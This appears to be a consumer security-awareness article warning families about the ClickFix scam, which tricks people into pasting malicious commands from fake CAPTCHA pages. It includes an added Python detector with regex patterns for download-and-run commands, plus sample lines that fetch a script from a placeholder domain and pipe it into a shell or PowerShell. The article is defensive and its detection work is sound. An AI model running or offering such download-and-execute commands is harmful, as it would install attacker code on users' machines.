One Line, One Click, One Malware: The Sneaky ClickFix Scam You Need to Warn Your Family About


You know that little string of text you copied and pasted into your terminal because a website told you to? That’s all it takes for your computer to be completely compromised.

It sounds almost too simple — and that’s exactly the problem.

Over the past year, scammers have pulled off one of the sneakiest and fastest-growing cyberattacks most people still haven’t heard of. It’s called ClickFix — a quick, clever technique that works on both Windows and macOS. And it’s spreading fast, right under the radar.


What is ClickFix?

ClickFix isn’t your typical phishing email. It’s smarter and more believable. It often starts with a message that seems legit — like an email from a hotel you just booked, complete with your reservation details. In other cases, it might come in through WhatsApp, or even show up at the top of a Google search result.

Once you click the link, you’re taken to a slick website that looks trustworthy. It might claim to be a CAPTCHA check or some kind of human verification. Then it asks you to do one simple thing:

Copy a line of text. Open Terminal or Command Prompt. Paste it. Press Enter.

That single line is the magic bullet.

In reality, the command quietly connects your device to a hacker-controlled server. From there, malware is downloaded and installed on your machine — without any warning or visible sign. No pop-ups. No antivirus alert. Just like that, your system is compromised.



The Damage Behind the Click

So, what exactly gets installed?

  • Credential stealers, such as the Shamos malware, which grab your saved passwords
  • Fake cryptocurrency wallets designed to steal your coins
  • Botnet software, turning your computer into someone else’s tool
  • Configuration tweaks to make sure the malware survives reboot

Another trick: depending on the device you’re using, the site may adapt and serve you the right kind of malware for your Windows or Mac system. Security firm Push Security even described versions where the page changes itself based on your OS.

Microsoft also flagged these attacks for using “LOLbins” — short for “living off the land binaries.” Basically, these are benign system tools used in a malicious way. Since these tools are part of your system already, they don’t trigger the usual antivirus alarms.
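As an added illustration (not code from this article or from the vendors it cites), the Python below screens a pasted command for the shape described above: a built-in system tool fetching something from the internet and running it. The rule list, the tool names in it and the sample commands are assumptions constructed for this example.

```python
import re

# Heuristic rules assumed for this example. The tool names are standard
# Windows/macOS utilities; the article itself does not name specific ones.
RULES = [
    ("downloads content and pipes it straight into a shell",
     r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    ("decodes hidden text and pipes it into a shell",
     r"\bbase64\s+(-d|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    ("PowerShell runs downloaded text as code",
     r"\b(iex|invoke-expression)\b.*\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b"),
    ("PowerShell started with a hidden window or encoded command",
     r"\bpowershell(\.exe)?\b.*\s-(enc|encodedcommand|w(indowstyle)?\s+hidden)\b"),
    ("mshta pointed at a web address",
     r"\bmshta(\.exe)?\b.*https?://"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in RULES]


def assess_pasted_command(command: str) -> list[str]:
    """Return the reasons a pasted command deserves a closer look (may be empty)."""
    one_line = " ".join(command.split())  # collapse line breaks and padding
    return [label for label, rx in COMPILED if rx.search(one_line)]


# Constructed samples; example.invalid is a reserved domain that never resolves.
SAMPLES = [
    "curl -fsSL https://example.invalid/verify.sh | bash",
    'powershell -w hidden -c "iex (iwr https://example.invalid/v.txt)"',
    "echo c2FtcGxl | base64 -d | sh",
    "curl -O https://example.invalid/manual.pdf",  # download only, nothing is run
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        reasons = assess_pasted_command(sample)
        print("REVIEW" if reasons else "no match", "|", sample)
        for reason in reasons:
            print("    -", reason)
```

A match is a reason to stop and read the command, not proof of malice (some legitimate installers use the same shape), and an empty result does not make a command safe.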


Why It Works: Trust and Timing

ClickFix doesn’t count on you being naive. It counts on you being in a rush. Say your hotel booking email tells you there’s a problem. You’re about to leave for your trip, you don’t want to mess it up, and the site looks just real enough. That’s when the scam works best.

Researchers from Sekoia found that many campaigns start by hijacking real accounts on travel booking platforms. The attacker gets access to genuine reservation info and sends realistic instructions to victims, who have no idea they’re talking to scammers.

Even the CAPTCHAs on fake pages are nearly identical to the ones used by services like Cloudflare. The attack blends in just enough to not raise alarms.


So What Can You Do?

Here’s the tough part: traditional antivirus tools, like Microsoft Defender, can catch some of these attacks — but not all of them. And once you paste and run that command yourself, you’ve basically given the malware permission.

That’s why the best defense, for now, is good old-fashioned awareness.

Heading into the holiday season, this is something worth bringing up at the dinner table. If someone in your family books hotels online, uses Google to search for links, or has Chrome and Terminal open at the same time — they need to know about ClickFix.

Tell them not to copy and paste any commands into Terminal or Command Prompt unless they’re 100% sure where it came from and what it does.



Here’s a Quick Checklist to Stay Safe:

  • Don’t enter commands into Terminal or Windows Command Prompt unless you trust the source completely.
  • Be wary of unexpected emails/messages, even if they look like they come from legit services.
  • Got a CAPTCHA that asks you to run terminal code? That’s a red flag.
  • Always double-check URLs in emails and search results before clicking. Even the top result can be compromised.
  • Keep macOS, Windows, and browser software updated — it’s not foolproof, but it helps.

Bottom line: if a random website tells you to copy-paste a line of code “just to confirm your humanity,” that’s not normal. That’s ClickFix.

And it only takes one click to regret it.
